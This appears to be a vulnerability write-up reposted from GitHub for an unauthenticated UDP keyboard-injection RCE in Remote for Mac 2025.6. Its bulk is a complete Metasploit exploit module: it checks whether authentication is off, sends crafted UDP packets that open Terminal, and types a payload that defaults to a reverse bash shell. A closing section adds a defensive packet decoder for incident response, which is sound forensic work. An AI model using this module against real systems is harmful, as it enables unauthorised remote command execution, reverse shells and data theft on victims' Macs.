Remote for Mac 2025.6 Unauthenticated UDP Keyboard RCE

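Vulnerability Information

Vulnerability name: Remote for Mac 2025.6 Unauthenticated UDP Keyboard RCE

Vulnerability type: Command execution

Severity: High

Description: This vulnerability affects Remote for Mac 2025.6, an application that lets users remotely control a Mac. It is commonly used in personal and enterprise environments for remote management and operation of Mac computers. Because the application is widely used, the vulnerability has a broad impact.

The vulnerability type is command execution. The root cause is that, when the "Allow unknown devices" setting is enabled, the application fails to properly verify the source of UDP packets, so an attacker can send specially crafted UDP packets that simulate keyboard input and execute arbitrary commands without authentication. Exploitation is direct and efficient, and can be triggered remotely over the network.

The security risk is very high: an attacker can use this vulnerability to execute arbitrary commands on the victim's Mac, which may lead to data leakage, service disruption, or other malicious activity. Because exploitation requires no authentication and can be automated, the barrier to attack is low and the potential harm is high. After a successful attack, the attacker gains the same privileges as the current user, which further increases the potential risk.

Product name: Remote for Mac

Affected version: 2025.6

Source: https://github.com/rapid7/metasploit-framework/blob/3f6f4d20993489afed96fe110b52a625dfbec434/modules%2Fexploits%2Fosx%2Fmisc%2Fremote_for_mac_udp_rce.rb

Type: rapid7/metasploit-framework:github issues

PoC Details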


require 'json'
require 'socket'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Remote for Mac 2025.6 Unauthenticated UDP Keyboard RCE',
        'Description' => %q{
          This module exploits an unauthenticated remote code execution vulnerability in Remote for Mac 2025.6.
          When the "Allow unknown devices" setting is enabled, it is possible to simulate keyboard input via UDP packets
          without authentication. By sending a sequence of key presses, an attacker can open the Terminal and execute
          arbitrary shell commands, achieving code execution as the current user.

          Tested on macOS Mojave and Ventura.
        },
        'Author' => ['Chokri Hammedi'],
        'License' => MSF_LICENSE,
        'References' => [
          ['URL', 'https://packetstorm.news/files/id/196351/']
        ],
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS, SCREEN_EFFECTS]
        },
        'Platform' => ['unix', 'osx'],
        'Arch' => ARCH_CMD,
        'Targets' => [['Remote for Mac 2025.6', {}]],
        'DefaultTarget' => 0,
        'DefaultPayload' => 'cmd/unix/reverse_bash',
        'DisclosureDate' => '2025-05-27'
      )
    )

    register_options(
      [
        Opt::RHOSTS(),
        Opt::RPORT(49229),
        OptBool.new('SSL', [true, 'Use SSL for HTTP check', true]),
        OptString.new('TARGETURI', [true, 'Base URI path', '/']),
      ]
    )
  end

  def check_auth_disabled?
    protocol = datastore['SSL'] ? 'https' : 'http'
    vprint_status("Checking authentication on #{protocol}://#{datastore['RHOSTS']}:#{datastore['RPORT']}#{datastore['TARGETURI']}api/getVersion")

    begin
      res = send_request_cgi({
        'method' => 'GET',
        'uri' => normalize_uri(datastore['TARGETURI'], 'api', 'getVersion'),
        'ctype' => 'application/json',
        'ssl' => datastore['SSL'],
        'rport' => datastore['RPORT'],
        'rhost' => datastore['RHOSTS']
      })

      if res&.code == 200
        json = JSON.parse(res.body)
        if json['requires.auth'] == false
          print_good('Authentication is disabled. Target is vulnerable.')
          return true
        else
          print_error('Authentication is enabled. Exploit aborted.')
          return false
        end
      else
        print_error('Unexpected response from target')
        return false
      end
    rescue ::Rex::ConnectionError, JSON::ParserError => e
      print_error("Connection or parsing error: #{e.message}")
      return false
    end
  end

  def exploit
    unless check_auth_disabled?
      fail_with(Failure::NotVulnerable, 'Target requires authentication or is unreachable')
    end

    udp_port = datastore['RPORT']
    target_ip = datastore['RHOSTS']

    initial_packets_hex = [
      '07000200370001',
      '07000200370001',
      '060003002000',
      '07000200370000',
      '07000200370000'
    ]

    final_packets_hex = [
      '07000200240001',
      '07000200240000'
    ]

    udp_sock = UDPSocket.new
    udp_sock.connect(target_ip, udp_port)

    print_status('Simulating system keyboard input to open Terminal...')
    initial_packets_hex.each do |hexpkt|
      udp_sock.send([hexpkt].pack('H*'), 0)
      select(nil, nil, nil, 0.05)
    end

    prefix = [0x06, 0x00, 0x03, 0x00].pack('C*')
    'terminal'.each_char do |ch|
      pkt = prefix + ch.encode('utf-16le').force_encoding('ASCII-8BIT')
      udp_sock.send(pkt, 0)
      select(nil, nil, nil, 0.1)
    end

    final_packets_hex.each do |hexpkt|
      udp_sock.send([hexpkt].pack('H*'), 0)
      select(nil, nil, nil, 0.1)
    end

    sleep(2)

    shell_cmd = payload.encoded
    print_status('Sending malicious payload to be executed...')

    shell_cmd.each_char do |ch|
      pkt = prefix + ch.encode('utf-16le').force_encoding('ASCII-8BIT')
      udp_sock.send(pkt, 0)
      select(nil, nil, nil, 0.1)
    end

    final_packets_hex.each do |hexpkt|
      udp_sock.send([hexpkt].pack('H*'), 0)
      select(nil, nil, nil, 0.1)
    end

    print_good('Payload sent. Awaiting session...')
  ensure
    udp_sock.close if udp_sock
  end
end
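
For incident response, the following added example (not part of the Metasploit module or of the original page) decodes captured UDP payloads in the two packet layouts the module above sends and rebuilds the text "typed" by each source. The field meanings, the key-name mapping, the helper names and the sample capture (documentation address 192.0.2.10, command `id`) are assumptions constructed for illustration.

```ruby
# Added example: rebuild keystrokes from captured Remote for Mac UDP payloads.
# Layouts inferred from the packets the module sends (assumption):
#   06 00 03 00 <UTF-16LE text>          typed character
#   07 00 02 00 <code, u16 LE> <state>   key event, state 01 = down, 00 = up
CHAR_PREFIX = "\x06\x00\x03\x00".b.freeze
KEY_PREFIX  = "\x07\x00\x02\x00".b.freeze
KEY_NAMES   = { 0x37 => 'CMD', 0x24 => 'RETURN' }.freeze # macOS virtual key codes

# Classify one UDP payload; returns nil for anything that is not a key packet.
def parse_datagram(payload)
  data = payload.b
  if data.start_with?(CHAR_PREFIX) && data.bytesize >= 6 && data.bytesize.even?
    text = data.byteslice(4..-1).force_encoding('UTF-16LE')
    { type: :char, text: text.encode('UTF-8', invalid: :replace, undef: :replace) }
  elsif data.start_with?(KEY_PREFIX) && data.bytesize == 7
    code, state = data.byteslice(4, 3).unpack('vC')
    { type: :key, name: KEY_NAMES.fetch(code, format('0x%02x', code)), down: state == 1 }
  end
end

# records: [[source_ip, payload_hex], ...] in capture order.
# Returns { source_ip => [typed line, ...] }, starting a new line at RETURN key-down.
def typed_lines(records)
  lines = Hash.new { |h, k| h[k] = [''.dup] }
  records.each do |src, hex|
    ev = parse_datagram([hex].pack('H*'))
    next unless ev
    buf = lines[src]
    if ev[:type] == :char
      buf.last << ev[:text]
    elsif ev[:down] && ev[:name] == 'RETURN'
      buf << ''.dup
    elsif ev[:down]
      buf.last << "<#{ev[:name]}>" # modifier or other key pressed
    end
  end
  lines.transform_values { |v| v.reject(&:empty?) }
end

# True when the lines contain a CMD key press plus the text "terminal" (Spotlight launch).
def terminal_launch?(lines)
  lines.any? { |l| l.include?('<CMD>') && l.gsub('<CMD>', '').strip.casecmp?('terminal') }
end

# Constructed capture: the module's key sequence, then the harmless command "id".
SAMPLE = %w[
  07000200370001 07000200370001 060003002000 07000200370000 07000200370000
  060003007400 060003006500 060003007200 060003006d00 060003006900 060003006e00 060003006100
  060003006c00 07000200240001 07000200240000 060003006900 060003006400 07000200240001 07000200240000
].map { |hex| ['192.0.2.10', hex] }.freeze
```

Feeding it the payloads of UDP traffic to the Remote for Mac port (49229 in the module's defaults) gives a per-source transcript that can be compared with what the legitimate user was doing at the time.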



Remote for Mac 2025.6 Unauthenticated UDP Keyboard RCE
http://example.com/2025/07/28/github_3535993157/
Author
lianccc
Published
July 28, 2025
License